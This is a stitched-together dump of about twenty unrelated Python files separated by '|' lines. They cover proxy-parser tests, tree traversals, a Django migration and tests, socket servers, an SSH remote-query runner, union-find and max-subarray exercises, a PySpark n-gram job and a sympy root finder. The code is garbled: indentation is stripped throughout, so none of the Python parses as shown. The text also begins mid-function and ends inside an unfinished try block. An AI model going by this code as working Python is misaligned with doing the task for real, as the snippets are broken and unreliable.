return ProxyServer(**fake_dict)
if data:
fake_dict = dict(
ip='127.0.0.1',
country=dict(hello=1),
anonymity='Hello',
uptime=1.123,
port=8080,
)
return ProxyServer(**fake_dict)
return _proxy_parser
def test_type_proxy_server_parser(proxy_parser):
proxy_server = proxy_parser(type_=True)
assert type(proxy_server.ip) == str
assert type(proxy_server.country) == dict
assert type(proxy_server.uptime) == float
assert type(proxy_server.anonymity) == str
assert type(proxy_server.port) == int
def test_data_proxy_server_parser(proxy_parser):
proxy_server = proxy_parser(data=True, type_=False)
assert proxy_server.ip == '127.0.0.1'
assert proxy_server.country == dict(hello='1')
assert proxy_server.uptime == 1.123
assert proxy_server.anonymity == 'Hello'
assert proxy_server.port == 8080
def test_proxy_object():
proxy_creator = ProxyO()
assert type(proxy_creator.list_proxy()) == list
assert type(proxy_creator.list_proxy(country='RU')) == list
assert type(proxy_creator.list_proxy(port=80)) == list
|
import glob
# import xml.etree.ElementTree as ET
# tree = ET.parse("./brcm-lnvgy_fw_cna_18b-oc14-12.0.1169.12-2_linux_x86-64.xml")
# print(tree.getroot())
# root = tree.getroot()
# crc = root.findall(".//*[@NAME='crc']/VALUE")
# for value in crc:
# print(value.text)
def strnset(s, ch, n):  # replace the tail of s from index n onward with ch
s = s[:n] + ch
return s
ll = []
listuxz = glob.glob("./*/*.uxz")
for tpm in listuxz:
ll.append(strnset(tpm,".xml",-4))
for tt in ll:
print(tt)
# import os
# from openpyxl import Workbook
# import datetime
# system = os.name
# env = os.environ
# filePath = os.path.abspath('.')
# print(system)
# print(filePath)
#
# wb = Workbook()
# ws = wb.active
# ws.title = "platform"
# ws['A1'] = 42
# ws.append([1,2,3])
# ws['b1'] = datetime.datetime.now()
# ws['A3'] = system
# ws['A4'] = filePath
# ws1 = wb.create_sheet("win2019")
# ws2 = wb.create_sheet("win2016")
# ws3 = wb.create_sheet("rhel7")
# ws4 = wb.create_sheet("suse12")
#
# wb.save("sample.xlsx")
|
#PASUMARTHI RUTWIK(19BCS084)
class node:
def __init__(self,key):
self.val=key
self.left=None
self.right=None
def printInorder(root):
if root:
printInorder(root.left)
print(root.val)
printInorder(root.right)
def printPostorder(root):
if root:
printPostorder(root.left)
printPostorder(root.right)
print(root.val)
def printPreorder(root):
if root:
print(root.val)
printPreorder(root.left)
printPreorder(root.right)
root=node("A")
root.left=node("B")
root.right=node("U")
root.left.left=node("S")
root.left.left.left=node("W")
root.left.left.left.left=node("Z")
root.left.right=node("R")
root.left.right.left=node("Y")
root.left.right.right=node("A")
root.right.left=node("E")
root.right.right=node("P")
root.right.right.left=node("G")
root.right.right.right=node("J")
print("Inorder is")
printInorder(root)
print("Postorder is")
printPostorder(root)
print("Preorder is")
printPreorder(root)
|
"""
Don't use this.
"""
import PyPDF2
def main():
"""Driver"""
text = ""
filename = 'sample_paper.pdf'
with open(filename, 'rb') as f:
read_pdf = PyPDF2.PdfFileReader(f)
num_pages = read_pdf.getNumPages()
for page_num in range(num_pages):
page = read_pdf.getPage(page_num)
page_content = page.extractText()
text += page_content
with open('pdfs_as_txt/' + filename.replace('.pdf', '.txt'), 'w') as f:
f.write(text)
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2019-01-27 04:31
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='Idea',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(editable=False, verbose_name='creation date and time')),
('modified', models.DateTimeField(editable=False, null=True, verbose_name='modification date and time')),
('meta_keywords', models.CharField(blank=True, help_text='Separate keywords by comma.', max_length=255, verbose_name='Keywords')),
('meta_description', models.CharField(blank=True, max_length=255, verbose_name='Description')),
('meta_author', models.CharField(blank=True, max_length=255, verbose_name='Author')),
('meta_copyright', models.CharField(blank=True, max_length=255, verbose_name='Copyright')),
('title_sw', models.CharField(blank=True, max_length=200, verbose_name='Title (sw)')),
('description_sw', models.TextField(blank=True, verbose_name='Description (sw)')),
],
options={
'verbose_name': 'Idea',
'verbose_name_plural': 'Ideas',
},
),
migrations.CreateModel(
name='Like',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('object_id', models.CharField(default='', help_text='Please enter the ID of the related object.', max_length=255, verbose_name='Related\tobject')),
('owner_object_id', models.CharField(default='', help_text='Please enter the ID of the related object.', max_length=255, verbose_name='Owner')),
('content_type', models.ForeignKey(help_text='Please select the type (model) for the relation, you want to build.', on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType', verbose_name="Related object's type (model)")),
('owner_content_type', models.ForeignKey(help_text='Please select the type (model) for the relation, you want to build.', on_delete=django.db.models.deletion.CASCADE, related_name='owner', to='contenttypes.ContentType', verbose_name="Owner's type (model)")),
],
options={
'verbose_name': 'Like',
'verbose_name_plural': 'Likes',
},
),
]
|
import socket
import json
class Colors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
host = '0.0.0.0'
port = 5000
size = 1024
x = 1
dictOfUsers = {}
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host,port))
s.listen(1)
while x == 1:
client, address = s.accept()
ADDRESS = json.dumps(address)
print('address: {}'.format(address))
Client = client.recv(size).decode().replace("'", '"')
Client = json.loads(Client)
print('{} connected and message: {}'.format(Colors.OKBLUE + Colors.BOLD + Client['username'] + Colors.ENDC, Colors.OKGREEN + Client['message'] + Colors.ENDC))
dictOfUsers[Client['username']] = {
"ip": str(address[0]),
"port": str(address[1])
}
if Client['username'] == 'Admin':
if Client['to'] == 'Server':
if Client['message'] == '1':
client.send((str(dictOfUsers)).encode())
#elif Client:
elif Client:
#s.accept() = client, tuple(str(dictOfUsers[Client['to']]['ip']), int(dictOfUsers[Client['to']]['port']))
s.sendto('sdhfbds', (str(dictOfUsers[Client['to']]['ip']), int(dictOfUsers[Client['to']]['port'])))
client.send(('recieved').encode())
client.close()
|
# -*- coding:utf-8 -*-
# Author: Jorden Hai
# Call operating-system commands through the os module
import os
cmd_res = os.system("dir")  # runs the command and prints to the screen; the output is not captured
print("-->",cmd_res)  # a return value of 0 means the command succeeded
# capture the output instead of printing it
cmd_res = os.popen("dir")
print("-->",cmd_res)
# add .read() to get the captured output as a string
cmd_res = os.popen("dir").read()
print("-->",cmd_res)
# create a directory
os.mkdir("new_dir")
|
import socket
import time
from struct import unpack
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(('', 1234))
while 1:
data, (address, port) = s.recvfrom(68)
level = address.split('.')[-1]  # the last octet of the IP is the level number
#drier = str(unpack('>H', data[4:6]))
#washingMachine = str(unpack('>H', data[6:8]))
#print washingMachine
#time.sleep(5)
print('address:', address)
print('port:', port)
print('level:', level)
print('data:', data)
drier, washing_machine = unpack('>HH', data[4:8])
print('dryer:', drier)
print('washing machine:', washing_machine)
print()
|
#!/usr/bin/env python
from __future__ import print_function
import os
import pipes
import tempfile
import shutil
import sys
import threading
KEEP_RESULTS=False
BASEDIR=None
# from https://stackoverflow.com/questions/5574702/how-to-print-to-stderr-in-python
def debug(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def run_subprocess(cmd, stdin=None, wait=True):
import subprocess
import shlex
# if we are pushing cmd through the shell, we quote it
process = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
if wait:
stdout,stderr = process.communicate(stdin)
return stdout.strip(), stderr
else:
return "", ""
def cleanup():
if KEEP_RESULTS:
return
if BASEDIR:
shutil.rmtree(BASEDIR)
def setup_dirs():
global BASEDIR, RESULT_DIR, OUTPUT_DIR
global COMBINE_LOG, COMBINE_RESULTS
BASEDIR = tempfile.mkdtemp()
RESULT_DIR = os.path.join(BASEDIR, "results")
OUTPUT_DIR = os.path.join(BASEDIR, "output")
COMBINE_LOG = os.path.join(BASEDIR, "master.log")
COMBINE_RESULTS = os.path.join(BASEDIR, "master.results")
os.makedirs(RESULT_DIR)
os.makedirs(OUTPUT_DIR)
debug("collecting results in", BASEDIR)
def print_file(filename, title="", fd=sys.stdout, force=False):
filetype,err = run_subprocess("file '%s'" % filename)
filetype = filetype.lower()
if filetype.find("ascii") != -1 or filetype.find("unicode") != -1 or force:
with open(filename) as f:
filedata = f.read().strip()
if title:
debug(title)
print(filedata, file=fd)
def debug_file(filename, title):
return print_file(filename, title, fd=sys.stderr)
def write_to_file(filename, data):
with open(filename, "w") as f:
f.write(data or "")
def run_local_commands(cmd):
out,err = run_subprocess("%s %s" % (SYBIL_BIN, cmd))
print(out)
def check_connection(host):
full_cmd = "ssh -O check %s " % (host)
out, err = run_subprocess(full_cmd)
if err.find("running") != -1:
return
run_subprocess("ssh -O exit %s " % (host))
debug("NO MASTER RUNNING FOR HOST %s, STARTING MASTER" % host)
run_subprocess("ssh -C -N -n %s #master process" % host, wait=False)
import time
# when we check our connection, we'll wait up to a second while
# establishing it
incr = 0.1
steps = int(1 / incr)
for _ in xrange(steps):
time.sleep(incr)
out, err = run_subprocess(full_cmd)
if err.find("running") != -1:
break
def run_command_on_host(host, working_dir, bin):
check_connection(host)
query_flag_file = os.path.join(BASEDIR, "query_flags.gob")
with open(query_flag_file) as f:
query_flag_data = f.read()
full_cmd = "ssh -C %s \"cd \"%s\" && \"%s\" query -decode-flags\"" % (host, working_dir, bin)
out, err = run_subprocess(full_cmd, stdin=query_flag_data)
write_to_file(os.path.join(RESULT_DIR, "%s.results" % host), out)
write_to_file(os.path.join(OUTPUT_DIR, "%s.log" % host), err)
debug("%s finished" % host)
def run_remote_commands(cmd):
global HOST_FILE
debug("*** running command on remote hosts")
debug_file(HOST_FILE, "*** host info is")
query_flag_data, err = run_subprocess("%s %s -encode-flags -encode-results" % (SYBIL_BIN, cmd))
query_flag_file = os.path.join(BASEDIR, "query_flags.gob")
write_to_file(query_flag_file, query_flag_data)
threads = []
for line in HOSTINFO:
bin="sybil"
working_dir="~"
host = line[0]
if len(line) > 1:
working_dir = line[1]
if len(line) > 2:
bin = line[2]
t = threading.Thread(target=run_command_on_host, args=(host, working_dir, bin))
threads.append(t)
t.start()
for t in threads:
t.join()
def print_remote_results():
for line in HOSTINFO:
host = line[0]
log_file = os.path.join(OUTPUT_DIR, "%s.log" % host)
result_file = os.path.join(RESULT_DIR, "%s.results" % host)
debug_file(log_file, "*** %s output" % host)
debug_file(result_file, "*** %s output" % host)
def aggregate_remote_results():
full_cmd = "%s aggregate \"%s\"" % (SYBIL_BIN, RESULT_DIR)
query_flag_file = os.path.join(BASEDIR, "query_flags.gob")
with open(query_flag_file) as f:
query_flag_data = f.read()
out, err = run_subprocess(full_cmd, query_flag_data)
combine_log = os.path.join(OUTPUT_DIR, COMBINE_LOG)
combine_results = os.path.join(RESULT_DIR, COMBINE_RESULTS)
write_to_file(combine_results, out)
write_to_file(combine_log, err)
debug_file(combine_log, "*** aggregator output")
print_file(combine_results, "***combined results", force=True)
def read_host_info():
global HOSTINFO
global HOST_FILE
hostinfo = sys.stdin.readlines()
hosts = []
for line in hostinfo:
line = line.strip()
if line[0] == '#':
continue
hosts.append(line.split(" "))
HOSTINFO = hosts
debug("host info", hosts)
HOST_FILE = os.path.join(BASEDIR, "hosts")
with open(HOST_FILE, "w") as f:
for line in HOSTINFO:
f.write(" ".join(line))
f.write("\n")
def main():
global CMD
setup_dirs()
operator = None
if len(sys.argv) > 1:
operator = sys.argv[1]
cmd = " ".join(sys.argv[1:])
debug("command to run is: sybil %s" % cmd)
if operator == "query":
read_host_info()
run_remote_commands(cmd)
print_remote_results()
aggregate_remote_results()
else:
run_local_commands(cmd)
if "DEBUG" in os.environ:
KEEP_RESULTS=True
if __name__ == "__main__":
SYBIL_BIN, _ = run_subprocess("which sybil")
try:
main()
finally:
cleanup()
# vim: set syntax=python
|
"""
From "이코테" (This Is Coding Test), p. 298
Students are numbered 0 through N.
At first every student is on a different team, so there are N+1 teams.
The teacher can use two operations: (1) merging two teams, (2) checking whether two students are on the same team.
Write a program that performs M operations and prints the result of every same-team check.
A same-team check is given as "1 a b".
7 8
0 1 3
1 1 7
0 7 6
1 7 1
0 3 7
0 4 2
0 1 1
1 1 1
-> No
No
YES
### This is a disjoint-set (union-find) problem, so solve it with union-find.
"""
def find_parent(parent, x):
if parent[x] != x:
return find_parent(parent, parent[x])
return x
def union_parent(parent, a, b):
a = find_parent(parent, a)
b = find_parent(parent, b)
if a < b:
parent[b] = a
else:
parent[a] = b
def check_parent(parent, a, b):
if find_parent(parent, a) == find_parent(parent, b):
print("YES")
else:
print("NO")
# n: number of students, m: number of operations
n, m = map(int, input().split())
parent = [0] * (n+1)
for i in range(n+1):
parent[i] = i
for _ in range(m):
check, a, b = map(int, input().split())
# merge the two teams (the smaller root number becomes the representative)
if check == 0:
union_parent(parent, a, b)
# check whether the two students are on the same team
else:
check_parent(parent, a, b)
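# Illustrative variant (not part of the original solution): find_parent with path
# compression keeps the trees flat, so repeated find/union operations stay close
# to O(1) amortized; union_parent and check_parent could call this instead.
def find_parent_compressed(parent, x):
    if parent[x] != x:
        parent[x] = find_parent_compressed(parent, parent[x])
    return parent[x]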
|
from math import isclose
from django.test import TestCase
from django.urls import reverse
from django.http import JsonResponse
from .views import getDataFrame
from .transform import top_ten
# Create your tests here.
DATA_FRAME = getDataFrame()
TOP_DEFAULT = {'peopleLikeYou': top_ten(DATA_FRAME)}
class LikeMeIndexTests(TestCase):
"LikeMeIndexTests is the default test project for the people-like-me route"
def test_should_return_json(self):
"the route should at the least return json matching the default sort order"
response = self.client.get(reverse('likeme:index'))
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
def test_should_query_by_name(self):
"here we look for Kendra and make sure that the first highest score result matches her name"
name = "Kendra"
response = self.client.get(reverse('likeme:index'), {"name": name})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_name = json[0]['name']
self.assertEqual(name, actual_name)
def test_should_query_by_age(self):
"search by age and test that the top result matches the age put in"
age = 30
response = self.client.get(reverse('likeme:index'), {"age": age})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_age = json[0]['age']
self.assertEqual(age, actual_age)
def test_should_return_empty_if_not_confident(self):
"if the probability is less than 0.4 do not return anything"
age = 1000
response = self.client.get(reverse('likeme:index'), {"age": age})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
self.assertEqual(len(json), 0, 'expected no results')
def test_should_query_by_latitude(self):
"latitude query with test that the top result matches"
latitude = 40.71667
response = self.client.get(reverse('likeme:index'), {"latitude": latitude})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_latitude = json[0]['latitude']
self.assertEqual(latitude, actual_latitude)
def test_should_query_by_longitude(self):
"tests that the top result matches the exact longitude given"
longitude = 59.6818456
response = self.client.get(reverse('likeme:index'), {"longitude": longitude})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_longitude = json[0]['longitude']
self.assertEqual(longitude, actual_longitude)
def test_should_query_by_location(self):
"this is to ensure that when searching by both longitude & latitude we don't skew the results"
latitude = 44.8501354
longitude = -0.5702805
response = self.client.get(reverse('likeme:index'), {"longitude": longitude, "latitude": latitude})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_longitude = json[0]['longitude']
self.assertEqual(isclose(longitude, actual_longitude), True, 'asserted longitudes would match')
actual_latitude = json[0]['latitude']
self.assertEqual(latitude, actual_latitude, 'asserted that latitudes would match')
def test_should_query_by_monthly_income(self):
"test that monthly income returns the correct results"
income = 5132
response = self.client.get(reverse('likeme:index'), {"monthly income": income})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_income = json[0]['monthly income']
self.assertEqual(income, actual_income, 'asserted incomes would match')
def test_should_query_by_monthlyIncome(self):
"monthlyIncome can also be camel cased so we test that functionality works too"
income = 5132
response = self.client.get(reverse('likeme:index'), {"monthlyIncome": income})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_income = json[0]['monthly income']
self.assertEqual(income, actual_income, 'asserted incomes would match')
def test_should_query_by_experienced_True(self):
"make sure that the top result has experienced True"
response = self.client.get(reverse('likeme:index'), {"experienced": True})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_experience = json[0]['experienced']
self.assertEqual(True, actual_experience)
def test_should_query_by_experienced_False(self):
"make sure the top result has experienced False"
response = self.client.get(reverse('likeme:index'), {"experienced": False})
self.assertIs(response.status_code, 200)
self.assertIs(type(response), JsonResponse)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_experience = json[0]['experienced']
self.assertEqual(False, actual_experience)
def test_should_query_on_three_fields(self):
# Branden,67,-7.1765737,111.3828738,4681,false
age = 67
latitude = -7.1765737
longitude = 111.3828738
query = {
'age': age,
'latitude': latitude,
'longitude': longitude
}
response = self.client.get(reverse('likeme:index'), query)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_longitude = json[0]['longitude']
self.assertEqual(isclose(longitude, actual_longitude), True, 'asserted longitudes would match')
actual_latitude = json[0]['latitude']
self.assertEqual(isclose(latitude, actual_latitude), True, 'asserted that latitudes would match')
actual_age = json[0]['age']
self.assertEqual(age, actual_age)
def test_should_query_on_four_fields(self):
# Glynis,70,27.756647,118.035309,14424,true
age = 70
latitude = 27.756647
longitude = 118.035309
income = 14424
query = {
'age': age,
'latitude': latitude,
'longitude': longitude,
'income': income
}
response = self.client.get(reverse('likeme:index'), query)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_longitude = json[0]['longitude']
self.assertEqual(isclose(longitude, actual_longitude), True, 'asserted longitudes would match')
actual_latitude = json[0]['latitude']
self.assertEqual(isclose(latitude, actual_latitude), True, 'asserted that latitudes would match')
actual_age = json[0]['age']
self.assertEqual(age, actual_age)
actual_income = json[0]['monthly income']
self.assertEqual(income, actual_income)
def test_should_query_on_five_fields(self):
# Jay,92,-22.9916783,-45.5651683,3476,true
age = 92
latitude = -22.9916783
longitude = -45.5651683
income = 3476
name = "Jay"
query = {
'name': name,
'age': age,
'latitude': latitude,
'longitude': longitude,
'income': income
}
response = self.client.get(reverse('likeme:index'), query)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_longitude = json[0]['longitude']
self.assertEqual(isclose(longitude, actual_longitude), True, 'asserted longitudes would match')
actual_latitude = json[0]['latitude']
self.assertEqual(isclose(latitude, actual_latitude), True, 'asserted that latitudes would match')
actual_age = json[0]['age']
self.assertEqual(age, actual_age)
actual_income = json[0]['monthly income']
self.assertEqual(income, actual_income)
actual_name = json[0]['name']
self.assertEqual(name, actual_name)
def test_should_query_on_six_fields(self):
# Lexis,80,0.5128922,-77.2864879,3839,false
age = 80
latitude = 0.5128922
longitude = -77.2864879
income = 3839
name = "Lexis"
experienced = "false"
query = {
'name': name,
'age': age,
'latitude': latitude,
'longitude': longitude,
'income': income,
'experienced': experienced
}
response = self.client.get(reverse('likeme:index'), query)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_longitude = json[0]['longitude']
self.assertEqual(isclose(longitude, actual_longitude), True, 'asserted longitudes would match')
actual_latitude = json[0]['latitude']
self.assertEqual(isclose(latitude, actual_latitude), True, 'asserted that latitudes would match')
actual_age = json[0]['age']
self.assertEqual(age, actual_age)
actual_income = json[0]['monthly income']
self.assertEqual(income, actual_income)
actual_name = json[0]['name']
self.assertEqual(name, actual_name)
actual_experience = json[0]['experienced']
self.assertEqual(False, actual_experience)
def test_should_ignore_extra_fields(self):
# Lexis,80,0.5128922,-77.2864879,3839,false
age = 80
latitude = 0.5128922
longitude = -77.2864879
income = 3839
name = "Lexis"
experienced = "false"
query = {
'name': name,
'age': age,
'latitude': latitude,
'longitude': longitude,
'income': income,
'experienced': experienced,
'extra': 'field',
'more': 'fields'
}
response = self.client.get(reverse('likeme:index'), query)
self.assertJSONNotEqual(str(response.content, encoding='utf8'), TOP_DEFAULT)
json = response.json()['peopleLikeYou']
actual_longitude = json[0]['longitude']
self.assertEqual(isclose(longitude, actual_longitude), True, 'asserted longitudes would match')
actual_latitude = json[0]['latitude']
self.assertEqual(isclose(latitude, actual_latitude), True, 'asserted that latitudes would match')
actual_age = json[0]['age']
self.assertEqual(age, actual_age)
actual_income = json[0]['monthly income']
self.assertEqual(income, actual_income)
actual_name = json[0]['name']
self.assertEqual(name, actual_name)
actual_experience = json[0]['experienced']
self.assertEqual(False, actual_experience)
|
import json
import requests
print('Loading function')
def lambda_handler(event, context):
print("Received event: " + json.dumps(event, indent=2))
r = requests.get('http://google.com')
print(r.text[:100])
# print("val1 = " + event['key1'])
# print("val2 = " + event['key2'])
# print("val3 = " + event['key3'])
# print('aaa: ', event['aaa'])
# print(event)
# return event['key1'] # Echo back the first key value
#raise Exception('Something went wrong')
return 'Hello WorldAAAAAAAAA!!!!'
|
# Because Flask creates its own instances of the given classes, dependency injection is challenging.
# Dependencies can either be passed in via kwargs or provided through this injector.
from control.WorkerControl import WorkerControl
from data.StorageIO import StorageIO
from data.ArchitectureIO import ArchitecureIO
class Injector:
workerControl: WorkerControl = None
storageIO: StorageIO = None
architectureIO: ArchitecureIO = None
@staticmethod
def inject(workerCont: WorkerControl, storage:StorageIO, architec: ArchitecureIO):
Injector.workerControl = workerCont
Injector.storageIO = storage
Injector.architectureIO = architec
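# Illustrative usage sketch (not part of the original module): wiring the injector at startup
# and reading a dependency inside a Flask view. `create_app` and the route below are
# hypothetical names; only Injector.inject() and the class attributes above are real.
#
#     Injector.inject(WorkerControl(), StorageIO(), ArchitecureIO())
#     app = create_app()
#
#     @app.route("/workers")
#     def workers():
#         return Injector.workerControl.status()  # assumes WorkerControl exposes a status() method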
|
import torch
import torch.nn.functional as F
from torch.utils.data import DataLoader
from transformers import Trainer
import numpy as np
import itertools
from tqdm import trange
import pickle
import json
import os
import logging
logger = logging.getLogger("sequence_tagger_auto")
class TextClassifier:
def __init__(
self,
auto_model,
bpe_tokenizer,
max_len=192,
pred_loader_args={"num_workers": 1},
pred_batch_size=100,
training_args=None,
trainer=None,
):
super().__init__()
self._auto_model = auto_model
self._bpe_tokenizer = bpe_tokenizer
self._pred_loader_args = pred_loader_args
self._pred_batch_size = pred_batch_size
self._training_args = training_args
self._trainer = trainer
self._named_parameters = auto_model.named_parameters
def predict(self, eval_dataset, evaluate=False, metrics=None):
if metrics is None:
metrics = []
self._auto_model.eval()
logits, _, metrics = self._trainer.predict(eval_dataset)
probs = F.softmax(torch.tensor(logits), dim=1).numpy()
preds = np.argmax(probs, axis=1)
print(metrics)
return preds, probs
|
n = int(input("max range ="))
for i in range(1, n):
print(i)
for i in range(1,n+1):
if(i%2==0):
print("even int", i)
for i in range(n+1):
if(i%2==1):
print("odd int", i)
|
import random
import timeit
_test_data = [
([1, 3, -5, 3, 3, 2, -9, -2], 8),
([31, -41, 59, 26, -53, 58, 97, -93, -23], 187),
([31, -41, 259, 26, -453, 58, 97, -93, -23], 285),
([41, -31, 59, -97, -53, -58, 26], 69),
([-97, 41, -31, 59, -97, -53, -58, 26], 69),
([31, -41, 59, 26, -53, 58, 97], 187),
([31, -41, 59, 26, -53, 58, 97, -1], 187),
([2, -10, 8, -10, 2], 8),
([41, -31, -59, -26, -13], 41),
([-31, -59, -26, -13, 47], 47),
([12], 12),
([1], 1),
([0], 0),
([-12], 0),
([-1], 0),
([-31, -59, -26, -13, -47], 0),
([], 0)
]
def run_tests(func, output=True):
"""
    runs a set of tests as specified in variable _test_data: tuples of a list of values and the expected result
@param func: max_sub_array solution to test, func is expected to accept a parameter of type list
and to return the maximum sum of a sub array found
optionally followed by further parameters being ignored by the test
@param output: boolean parameter stating whether results should be written to console
    @return: boolean value indicating whether all tests have run successfully
"""
if output:
print('testing function ', func.__name__, end='')
ok = True
for values, res in _test_data:
try:
r = func(values)
except BaseException as e:
r = e
if type(r) == list or type(r) == tuple:
r = r[0]
if r != res:
if output:
print('\n\ttesting with', values, 'expecting', res, 'got', r, end='')
ok = False
if output:
print(' -- ok' if ok else '\n')
return ok
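# A minimal example (for illustration only, not one of the solutions under test) of a function
# that satisfies the contract described in run_tests' docstring: it accepts a list of values and
# returns the maximum sum of a sub array, where the empty sub array (sum 0) is allowed.
def max_sub_array_example(values):
    best = 0        # the empty sub array is permitted, so the result is never below 0
    current = 0
    for v in values:
        current = max(0, current + v)   # reset the running sum once it drops below 0 (Kadane's algorithm)
        best = max(best, current)
    return best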
_rand_data_storage = dict()
def _rand_data(n):
if n not in _rand_data_storage:
_rand_data_storage[n] = [random.randint(-100, 100) for _ in range(n)]
return _rand_data_storage[n]
def measure_times(func, last_result_only=False, number=1):
"""
Runs func on successively growing data (amount doubled for each run) and measures time for comparison
    :param func: function to measure times for
    :param last_result_only: if True, print only the timing of the final (largest) run
    :param number: number of runs per measurement (default: 1 because of long duration with large data already)
    :return: None
"""
print('\nMeasuring time of ', func.__name__)
n = 10
data = _rand_data(n)
t1 = timeit.timeit(lambda: func(data), number=number)
if not last_result_only:
print(n, ' values: ', t1, 'sec')
while t1 < 10 and n < 1000000:
n *= 2
t0 = t1
data = _rand_data(n)
t1 = timeit.timeit(lambda: func(data), number=number)
if not last_result_only:
print(n, ' values: ', t1, 'sec, ratio: ', t1 / t0)
if last_result_only:
print(n, ' values: ', t1, 'sec, ratio: ', t1 / t0)
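# Example driver (illustrative): run the correctness tests first, then the timing measurement,
# using the sketch above as the solution under test.
if __name__ == '__main__':
    if run_tests(max_sub_array_example):
        measure_times(max_sub_array_example, last_result_only=True)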
|
__version__ = "0.1.0"
from .wrapper import Kadena
|
# This code cleans out the text features and
# computes bigrams and trigrams for them
from operator import add
from pyspark.ml.feature import NGram, StopWordsRemover
from pyspark.sql import SQLContext
from pyspark.sql.functions import udf
from pyspark.sql.types import ArrayType, StringType
from pyspark import SparkConf, SparkContext
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
conf = SparkConf().setAppName("Computing ngrams for a few million tweets")
sc = SparkContext(conf=conf)
spark = SQLContext(sc)
dd = sc.textFile('preprocessed_tweets.csv').map(lambda x: x.split(',', 1)).map(lambda x: (x[0], x[1].split()))
df = dd.toDF(['username', 'tweets'])
def remove_l_c_words(df, least, most):
# Let's find out which words we keep
vocabulary = df.map(lambda row: row.tweets).reduce(lambda x,y: x+y)
count = sc.parallelize(vocabulary).map(lambda word: (word, 1)).reduceByKey(add)
count = count.sortBy(lambda wc: wc[1], ascending=False)
# Add to the list of stopwords
stop_words_lc = count.filter(lambda wc: wc[1] == least).map(lambda wc: wc[0]).collect()
if most < 1:
stop_words = stop_words_lc
else:
stop_words_mc = count.map(lambda wc: wc[0]).take(most)
stop_words = stop_words_lc + stop_words_mc
remover = StopWordsRemover(inputCol="tweets", outputCol='cleaned_tweets', stopWords=stop_words)
return remover.transform(df)
df = remove_l_c_words(df, least=1, most=50)
# Let's create the bigrams and trigrams
bigrams = NGram(n=2, inputCol='cleaned_tweets', outputCol='bigrams')
trigrams = NGram(n=3, inputCol='cleaned_tweets', outputCol='trigrams')
df = bigrams.transform(df)
ngramDF = trigrams.transform(df)
def add_col(x, y, z):
return x + y + z
udf_concat = udf(add_col, ArrayType(StringType()))
final_df = ngramDF.withColumn("total", udf_concat("cleaned_tweets", "bigrams", "trigrams")).select('username', 'total').toDF('username', 'tweets')
df_to_save = remove_l_c_words(final_df, least=1, most=0).select('username', 'cleaned_tweets').rdd
df_to_save = df_to_save.map(lambda row: (row.username, ",".join(row.cleaned_tweets)))
df_to_save.map(lambda x: "|".join(x)).saveAsTextFile('ngrams_tweets')
|
x = input("Name = ")
fi = "file1.txt"
file = open(fi ,'w')
file.write(x)
file.close()
file = open(fi , 'r')
file3 = file.read()
#print(file3)
file.close()
xd = "file4.txt"
file = open(xd,'w')
file.write(file3)
file.close()
|
from sympy import *
import numpy as num
import cmath
def mainFunc(function):
expr = sympify(function)
x = var('x')
sol = solve(expr, x)
    if sol == [LambertW(1)]:
        sol = [0.5671432904097]
for solut in sol:
try:
print('\n Exact root is: %0.8f' % solut)
